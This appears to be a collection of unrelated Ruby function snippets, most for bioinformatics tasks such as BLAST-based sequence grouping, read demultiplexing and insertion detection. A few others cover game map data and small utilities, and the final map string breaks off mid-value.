"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def detect_long_insertion(insert_pair, clip_Bs2, clip_Fs2, unmap_seq, alt_read_depth=5)\n paired_indel_list = []\n insert_pair.each do |consensus_b, consensus_f|\n total_depth = consensus_b.depth + consensus_f.depth\n clip_chrpos_all = [consensus_b.start_pos, consensus_b.end_pos, consensus_f.start_pos, consensus_f.end_pos]\n clip_start = clip_chrpos_all.min\n clip_end = clip_chrpos_all.max\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 1.0) # %identity = 1.0\n consensus, trim_flag = trim_consensus(consensus)\n # ---------------------------------------------------------------------------\n\n if consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( > 2), uncomplete Long Insertion\n #puts \"uncomplete long insertion...\"\n\n # re-alignement using unmapped read\n can_use_unmaps = unmap_seq.find_all do | unmap|\n (unmap.start_pos < clip_start && clip_start < unmap.end_pos) || (unmap.start_pos < clip_end && clip_end < unmap.end_pos)\n end\n if can_use_unmaps.empty? # unmap read is nothing\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n\n else # unmap reads exist\n new_group_reads = ([consensus_b, consensus_f] + can_use_unmaps)\n new_consensus, _ = mafft_consensus(new_group_reads, 1.0) # make a consensus seq with the unmapped reads\n new_consensus, trim_flag = trim_consensus(new_consensus)\n\n if new_consensus.empty? || new_consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( >=3)\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n else\n new_consensus, _ = mafft_consensus(new_group_reads, 0.5) # make a consensus seq with the unmapped reads\n new_consensus = trim_consensus_with_flag(new_consensus, trim_flag)\n\n new_total_depth = new_group_reads.inject(0){|res, read| res += read.depth}\n if new_total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI_wU, start_pos: clip_start, end_pos: clip_end, seq: new_consensus, depth: new_total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n end\n end\n\n else\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 0.5) # %identity = 0.5, consensus update\n consensus = trim_consensus_with_flag(consensus, trim_flag)\n\n #puts \"complete long insertion...\"\n #puts align_reads_names\n #puts\n if total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI, start_pos: clip_start, end_pos: clip_end, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n end\n end\n return paired_indel_list\n end",
"def mm_selreads(cigarstring, selread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif selread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def find_secondaries\n\n if File.exist?(@reciprocal_hits)\n # puts \"reciprocal output already exists\"\n else\n length_hash = Hash.new\n fitting = Hash.new\n @evalues.each do |h|\n length_hash[h[:length]] = [] if !length_hash.key?(h[:length])\n length_hash[h[:length]] << h\n end\n\n (10..@longest).each do |centre|\n e = 0\n count = 0\n s = centre*0.1\n s = s.to_i\n s = 5 if s < 5\n (-s..s).each do |side|\n if length_hash.has_key?(centre+side)\n length_hash[centre+side].each do |point|\n e += point[:e]\n count += 1\n end\n end\n end\n if count>0\n mean = e/count\n fitting[centre] = mean\n end\n end\n hits = 0\n @missed.each_pair do |id, list|\n list.each do |hit|\n l = hit.alnlen.to_i\n e = hit.evalue\n e = 1e-200 if e==0\n e = -Math.log10(e)\n if fitting.has_key?(l)\n if e >= fitting[l]\n if !@reciprocals.key?(id)\n @reciprocals[id] = []\n found = false\n @reciprocals[id].each do |existing_hit|\n if existing_hit.query == hit.query &&\n existing_hit.target == hit.target\n found = true\n end\n end\n if !found\n @reciprocals[id] << hit\n hits += 1\n end\n end\n end\n end\n end\n end\n end\n return hits\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def merge_read_to_run(runid, reads)\n if reads.size == 1\n (reads[0].drop(1).insert(0, runid) << \"SINGLE\").join(\"\\t\")\n else\n pairs = remove_nonpair(reads)\n if pairs.size == 2\n merge_paired_reads(pairs).join(\"\\t\")\n else\n \"PAIR CORRUPTED: #{runid}\"\n end\n end\n end",
"def remove_duplicates_full (temp_geo)\n geo_full_final=Array.new\n indexes=Array.new\n i=1 \n while temp_geo[i]\n j=i-1\n \tuntil j==0\n \t if temp_geo[i][:long]==temp_geo[j][:long] && temp_geo[i][:lat]==temp_geo[j][:lat]\n \t\t unless indexes.include? i\n \t\t indexes.push(i) \n \t \t end\n \t \tbreak\n \t else\n \t j-=1\n \t end \n \tend \n \t i+=1\n end\n\t p \"loading uniq data\"\n\t i=0\n\t while indexes[i]\n \t\t unless indexes.include?(i)\n\t\t\t geo_full_final.push(temp_geo[i])\t\t\n \t\t end\t\n \t i+=1\n\t end\ngeo_full_final\nend",
"def match(i, j, protein)\n twin = [protein.sequence[i-1], @genome.sequence[j-1]].sort\n st = twin.join\n @@blosum62[st]\n end",
"def reading_frame_validation(lst = @hits)\n\n rfs = lst.map{ |x| x.hsp_list.map{ |y| y.query_reading_frame}}.flatten\n frames_histo = Hash[rfs.group_by { |x| x }.map { |k, vs| [k, vs.length] }]\n #rez = \"\"\n rez={}\n frames_histo.each do |x, y|\n #rez << \"#{x} #{y}; \"\n rez[x]=y\n end\n\n # if there are different reading frames of the same sign\n # count for positive reading frames\n count_p = 0\n count_n = 0\n frames_histo.each do |x, y|\n if x > 0\n count_p = count_p + 1\n else \n if x < 0\n count_n = count_n + 1\n end\n end\n end\n\n if count_p > 1 or count_n > 1\n answ = \"INVALID\"\n else\n answ = \"VALID\"\n end\n\n @reading_frame = rez \n return [answ, rez]\n end",
"def cache_ids()\n hit_values = File.open(@mzid_file) do |io|\n doc = Nokogiri::XML.parse(io, nil, nil, Nokogiri::XML::ParseOptions::DEFAULT_XML | Nokogiri::XML::ParseOptions::NOBLANKS | Nokogiri::XML::ParseOptions::STRICT)\n doc.remove_namespaces!\n root = doc.root\n \n cache_db_seq_entries(root)\n cache_pep_ev(root)\n \n peptide_lst = root.xpath('//Peptide')\n @pep_h = Hash.new\n @mod_h = Hash.new\n peptide_lst.each do |pnode|\n \n pep_id = pnode['id']\n pep_seq = get_peptide_sequence(pnode)\n mod_line = get_modifications(pnode)\n @pep_h[pep_id] = pep_seq \n @mod_h[pep_id] = mod_line \n end\n \n end\n end",
"def unmatched_keys; end",
"def createIncorrectAns(min, max, correctHash, nOfAnswers, error)\n\tincorrectHash = {}\n \twhile incorrectHash.length < nOfAnswers\n \t\tincSum = -1\n \t\twhile incSum <= 0 || incSum == correctHash\n \t\t\tincSum = correctHash + rand(-error..error)\n \t\tend\n\n\t \t# -- Check for repeating answers -- #\n\t \tif !incorrectHash.has_value?(incSum)\n\t\t\tincorrectHash[\"incorrect\" + incorrectHash.length.to_s] = incSum\n\t\tend\n \tend\n \treturn incorrectHash\nend",
"def unique_visit\n parsed_result.each do |result|\n visit_hash[result.first] = result.last.uniq.count\n end\n visit_hash.sort_by{|k,v| v}.reverse.to_h\n end",
"def final_candidates(before, after, output_file)\n\t\tcandidates = {}\n\t\tall_ids = {}\n\n\t\t# Read circular candidates into hash\n\t\tFile.open(before, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tpos = [line[0..1], line[3..4]].join(':')\n\t\t\tread_count = line[6].to_i\n\t\t\tqname = line[-1].split(';')\n\t\n\t\t\t# Create qname index to make search faster\n\t\t\t# Remark 2\n\t\t\tqname.each do |q|\n\t\t\t\tk1, k2 = q.split(':')[3..4]\n\t\t\n\t\t\t\tall_ids[k1] = {} if !all_ids.has_key?(k1)\n\t\t\n\t\t\t\tif !all_ids[k1].has_key?(k2)\n\t\t\t\t\tall_ids[k1][k2] = [q]\n\t\t\t\telse\n\t\t\t\t\tall_ids[k1][k2] << q\n\t\t\t\tend\n\t\t\tend\n\n\t\t\tcandidates[pos] = {:counts => read_count, :qnames => qname}\n\t\tend\n\n\t\t# Read remapped readpairs and compare them to initial candidates\n\t\tFile.open(after, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tqname = line[0]\n\t\t\tpos = [line[1..2], line[3..4]].join(':')\n\t\t\tk1, k2 = qname.split(':')[3..4]\n\n\t\t\tread_unused = (!all_ids.has_key?(k1) || !all_ids[k1].has_key?(k2) || !all_ids[k1][k2].include?(qname)) \n\t\t\t\t\t\t\n\t\t\t# Add read if read is not already used (condition 2)\n\t\t\tif candidates.has_key?(pos) && read_unused \n\t\t\t\tcandidates[pos][:counts] += 1\n\t\t\t\tcandidates[pos][:qnames] << qname\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput.puts %w(chr pos_a chr_b pos_b readCounts qnames).join(\"\\t\")\n\t\n\t\t\tcandidates.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:counts], v[:qnames].join(';')].join(\"\\t\")\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Final candidate list finished.\"\n\tend",
"def cambioRondas(n)\n rond=@mapaactual[@mapaactual.keys[2]]\n @mapaactual[@mapaactual.keys[2]]=rond+n\n @mapaactual\n end",
"def trial_maps\n [\n Map.new(\n name: 'San Francisco',\n data: 'color_ff7575-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000004000000000000000000000000000000000000000000000000000000000000000_00000000000004004004000000000000000000000000000000000000000000000000000000000000_00000000000000404040000000000000000000000000000000000000000000000000000000000000_00000000000000040400000000000000000000000000000000000000000000000000000000000000_00000110000044404044400000000000000000000000000000000000000000000000000000000000_00011111100000041400000000000000000000000000000000000000000000000000000000000000_00011111100000401040000000000000000000000000000000000000000000000000000000000000_00011000100004001004000000000000000000000000000000000000000000000000000000000000_000111111000000111000000000000000000000000000000000000000000000000000000000
00000_00010010100000011100000000000000000000000000000044000000000000000440000000000000_00011111100000011100000000000000000000000000000011000000000000000110000000000000_00011111100000011100000000000000000000000000000011000000000000000110000000000000_00010011100000111110000000000000000000000000001011010000000000010110100000000000_04011111100000111110000000000000000000000000001011010000000000010110100000000000_44411010110000110010001110000000000000000000101011010100000001010110101000000000_14411111111100111110011111000000000000000010101011010100000001010110101010000000_11111111111101111111011101000000000000001010101011010101000101010110101010100000_11111011110111110011111111000000000000101010101011010101010101010110101010101003_11111111111110111111111111110000000010101010101011010101010101010110101010101011_11111111111111111111010011111444111111111111111111111111111111111111111111111111_11111111111111111111111111011110000001110000000011000000000000000110000000001111_11111111441111000111111111111111000001110000000011000000000000000110000000011111_11000111001101111111111144111111110111111110000011000000000000000110000000111111_11020000000000001111000000011111110111111110000011000000000000000110000001111111_11111111111111000000000011000000000111111110000011000000000000000110000001111111_11111111111111111111111111111111111111111110000111100000000000001111000001111111',\n skill_mean: 1,\n ),\n Map.new(\n name: 'The Bunker',\n data: 'color_8a8a5c-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000001000000000000000000000000000000000000000000000000000000000000000000000000_02000011000000100000000000000000000000000000000000000000000000000000000000000001_11111111111000110000000000000000000000000000000000000000000000000000000000101111_11111111111111111101000000000000000000000000000000000000000000000010001111111111_11111111111111111111111000000000000000000000000000100000010001111111111111111111_11111111111111111111111110100000001111011110000001100001111111111111111111111111_11111111111111111111111111111000111550005511111111111111111111111111111111111111_11111111111111111111111111111111111550005511111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111110000000111111111111111111111_11111111111111111101111111111111111150005111111111100000000011111111111111111111_11111111111111111111000000011111111150005111111111000111110001111111111111111111_11111111111111111111000000001111111150005111111110001111111000111111111111111111_11111111111111111111001111000111111150005111111100011111111100011111111111111111_11111111111111111111011111100011101150005110111000111111100110001111111111111111_11111111111111111111001111110001111150005111110001111111100011000001111111111111_11111111111111111111011111111000111150005111100011111111100001100001111111111111_11111111111111111111001111111100001150005110000111111111100000111001111111111111_11111111111111111111011111111110001150005110001111111100000000000001111111111111_11111111111111111111001111111111101150005110111111111000000000000001111111111111_11111110111111111101011111111111101100000110111111110001111111111111111111111111_11111111111111111111001111111101101100000110101111100011011111111111
111111111111_11111111100000000000011111111111101100000110111111000111111111111111111111111111_11111111100000004000001111111111101100000110111000001100111111111111111111111111_11111111000000044400011111111111101100000110111000011000111111111111111111111111_10111110000000444444001111111111101000000010111000110000111111111111111111111111_11111100100000444444401111111111100000000000111011100000000011111111111111111111_11000001111111111111111111111111111100000111111000000000000001111111111111111111_11000011111111111111111111111111111100000111111111111111111000111111111111111111_11000011111111111110111111111110111100000111101111111111011100011111111111111111_11000001111111111111111111111111111100000111111111111111111110001111111111111111_11111100100000000011100000000011100000000000111000000001110011000001111111111111_10111110000000000011100000000011100000000000111000000001110001100001111111111111_11111111000000000511100000440011100000000000111000000001110000111001111111111111_11111111100003000551000000444001000000000000010000000000100000000001111111111111_11111111100011105555500004444400000000000000000000000000000000000001111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 2,\n ),\n Map.new(\n name: 'Caravel Ships',\n data: 
'color_4d94ff-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000400000000000000000000000_00000000000000000000000000000000000000000000000000400000100000000000000000000000_00000000000000000000000000000000000000000000000000100000100000000000000000000000_00000000000000000000000000000000000000000000000000100000100000000040000000000000_00000000000000000000000000000000000000000000000001100001100000000010000000000000_00000000000000000000000000000000000000000000000011100011100000000010000000000000_00000000000000000000000000000000000000000000000110100110100000000110000000000000_00000000000000000000000000000000000000000000001110100110100000001110000000000000_00000000000000000000000000000000000000000000001100101110100000001110000000000000_00000000000000000000000000000000000000000000011100101110100000011010000000000000_00000000000000000000000000000000000000000000011100101110100000011010000000000000_00000000000000000000000000000000000000000000011100101110100000011010000000000000_0000000000010000000000000000000000000000000000110010011010
0000111010000000000000_00000000001110001000000000000000000000000000001110100110100000111010000000000000_00000010000111011100000000000000000000000000001110100110100000111010000000000000_00000111000111001110000000000000000000000000000110100010100001111010000000000000_00000011000111001110000000000000000000000000000111100011100011111111000000000000_00000011000111001110000000000000000000000000000001100001100000000110000000000000_00000011000110001100000000000000000000000000000001100001100000000010000000000000_00000011000110001100000000000000000000000000000000100000100000000011100000000000_00000010000100001000000000000040000000111114444444144444144444444411100000000000_00001110000100001002000000004444000000000111111001111111111111001111110000000000_00001110000100011111100001111444111000000011100011100011100011100511100000000030_00001111111111111110000001111111110000000011100111140011100411110511100000011111_55551111111111111155555555111111155555555551100004444000004444000011155551111111_55555511111111111555555555555555555555555555111111144411144411111111555511111111_55555555555555555555555555555555555555555555551111111111111111111111555511111111_55555555555555555555555555555555555555555555555555555555555555551155555111111111_55555555555555555555555555555555555555555555555555555555555555555555551111111111',\n skill_mean: 3,\n ),\n Map.new(\n name: 'Tower in the Castle',\n data: 'color_c2e0ff-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00050000000000000000000000000000000000000000000000000000000000000000000000000000_00010000000050000000000000000000000000000000000000000000000000000000000000000000_00010000000010000000000000000000000000000000000000000000000000000000000000000000_00515000000010000000500000000000000000000000000000000000000000000000000000000000_00111000000515000000100000000000000000000000000000000000000000000000000000000000_00111000000111000000100000000000000000000000000000000000000000000000000000000000_05111500000111000005150000000000000000000000000000000000000000000000000000000000_01111100005111500001110000000000000000000000000000000000000000000000000000000000_51111150001111100001110000000000000000000000000000000000000000000000000000000000_11111110051111150051115000000000000000000000000000000000000000000000000000000000_00111000011111110011111000000000000000000000000000000000000000000000000000000000_00111000000111000511111500000000000000000000000000000000000000000000000000000000_00111000000111000111111100000000000000000000000000000000000000000000000000000000_00111000000111000001110000000000000000000000000000000000000000000000000000000000_001110000001110000011100000000000000000000
00000000000000000000000000000000000000_00101000000000000000000000000000000000000000000000000000000000000000000000000000_00100011111111000000301000000000000000000000000000000000000000000000000000000000_00100110111111111111111000000000000000000000000000000000000000000000000000000000_00001110111111111111111000000000000000000000000000000000000000000000000000000000_00011010111110000051115000000000000000000000000000000000000000000000000000000000_10001010111100000005150000000000000000000000000000000000000000000000000000000000_11100010111100000000100000000000000000000000000000000000000000000000000000000000_10110010111100000000500000000000000000000000000000000000000000000000000000000000_10011000111100000000000000000000000000000000000000000000000000000000000000000000_10001100111100000000000000000000000000000000000000000000000000000000000000000000_10100001111100000000000000000000000000000000000000000000000000000000000000000000_10100011111100000000000000000000000000000000000000000000000000000000000000000000_10100110111100000000000000000000000000000000000000000000000000000000000000000000_10101110111100000000000000000000000000000000000000000000000000000000000000000000_11100010111100000000000000000000000000000000000000000000000000000000000000000000_11110010111100000000000000000000000000000000000000000000000000000000000000000000_11111000111100000110110110000000001101101100000000000000000000000000000000000000_11111100111100000111111110000000001111111100000000000000000000000000000000000000_10101110111110000111111110000000001111111100000001000010000000000000000000000000_10101000111110000111111110000000001111111100000001000010000000000000000000000000_10100011111100000001111000000000000011110000000011000011000000000000000000000000_10100110111001101101111011011011011011110000000010000001000000000000000000000000_10001100110011111111111111111111111111